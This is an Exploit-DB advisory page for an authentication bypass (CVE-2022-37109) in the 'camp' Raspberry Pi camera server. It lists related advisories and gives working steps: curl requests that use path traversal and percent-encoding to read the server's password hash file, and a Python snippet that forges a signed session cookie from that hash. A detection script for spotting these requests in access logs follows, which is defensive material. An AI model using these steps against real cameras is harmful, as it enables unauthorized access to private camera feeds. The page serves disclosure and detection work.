"camp" Raspberry Pi camera server 1.0 - Authentication Bypass

25 Mar 2023 00:00:00 | Reported by Elias Hohl | Type: exploitdb | Source: www.exploit-db.com

Authentication bypass vulnerability in the "camp" Raspberry Pi camera server 1.0. The exploit allows unauthorized access to the "camp" server.

Related

Reporter | Title | Published | Views | Family
0day.today | Raspberry Pi Camera Server 1.0 Authentication Bypass Vulnerability | 27 Mar 2023 00:00 | – | zdt
Circl | CVE-2022-37109 | 1 May 2025 19:15 | – | circl
CNNVD | patrickfuller camp security vulnerability | 14 Nov 2022 00:00 | – | cnnvd
CVE | CVE-2022-37109 | 14 Nov 2022 00:00 | – | cve
Cvelist | CVE-2022-37109 | 14 Nov 2022 00:00 | – | cvelist
EUVD | EUVD-2022-39762 | 3 Oct 2025 20:07 | – | euvd
NVD | CVE-2022-37109 | 14 Nov 2022 21:15 | – | nvd
Packet Storm | Raspberry Pi Camera Server 1.0 Authentication Bypass | 27 Mar 2023 00:00 | – | packetstorm
Prion | Improper access control | 14 Nov 2022 21:15 | – | prion
Positive Technologies | PT-2022-23818 · Unknown · Patrickfuller Camp | 14 Nov 2022 00:00 | – | ptsecurity

# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109

"camp" Raspberry Pi camera server Authentication Bypass vulnerability

https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904

1. Start an instance of the "camp" server:
python3 server.py --require-login

2. Fetch the SHA-512 password hash using one of these methods:

curl http://localhost:8000/static/password.tx%74

OR

curl http://localhost:8000/static/./password.txt --path-as-is

OR

curl http://localhost:8000/static/../camp/password.txt --path-as-is

3. Execute the following Python snippet (replace the hash with the one you received in step 2).

from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
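
A detection sketch for the three request forms in step 2, added here as an example (not code from the original advisory or from the camp project): it percent-decodes and normalizes each logged request target under /static/ and flags encoded unreserved characters, dot segments, paths that leave /static/, and anything resolving to password.txt. The log format, the sample lines and all function names are assumptions, and it presumes the access log records the request target as received.

```python
import posixpath
import re
import string
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the original page); statuses are illustrative.
SAMPLE_LOG = """\
127.0.0.1 - - [25/Jul/2022:10:00:01 +0000] "GET /static/style.css HTTP/1.1" 200 512
127.0.0.1 - - [25/Jul/2022:10:00:02 +0000] "GET /static/password.tx%74 HTTP/1.1" 200 128
127.0.0.1 - - [25/Jul/2022:10:00:03 +0000] "GET /static/./password.txt HTTP/1.1" 200 128
127.0.0.1 - - [25/Jul/2022:10:00:04 +0000] "GET /static/../camp/password.txt HTTP/1.1" 200 128
127.0.0.1 - - [25/Jul/2022:10:00:05 +0000] "GET /static/password.txt HTTP/1.1" 403 0
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
PCT_RE = re.compile(r"%([0-9A-Fa-f]{2})")
UNRESERVED = set(string.ascii_letters + string.digits + "-._~")
STATIC_PREFIX = "/static/"
SENSITIVE_NAME = "password.txt"  # file name taken from step 2

def classify(target):
    """Return the reasons a /static/ request target resembles step 2."""
    raw = urlsplit(target).path
    if not raw.startswith(STATIC_PREFIX):
        return []
    decoded = unquote(raw)
    normalized = posixpath.normpath(decoded)
    reasons = []
    # Ordinary clients do not percent-encode unreserved characters such as "t".
    if any(chr(int(h, 16)) in UNRESERVED for h in PCT_RE.findall(raw)):
        reasons.append("encoded-unreserved")
    # "." and ".." segments reach the server only when the client skips normalization.
    if any(seg in (".", "..") for seg in decoded.split("/")):
        reasons.append("dot-segment")
    if not (normalized + "/").startswith(STATIC_PREFIX):
        reasons.append("escapes-static")
    if posixpath.basename(normalized).lower() == SENSITIVE_NAME:
        reasons.append("password-file")
    return reasons

def suspicious_requests(log_text):
    """Return (target, status, reasons) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        reasons = classify(m.group(1)) if m else []
        if reasons:
            hits.append((m.group(1), int(m.group(2)), reasons))
    return hits
```

A flagged request with a 200 status means the hash file was served; since step 3 signs the cookie with that hash, the password should then be treated as compromised and changed.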
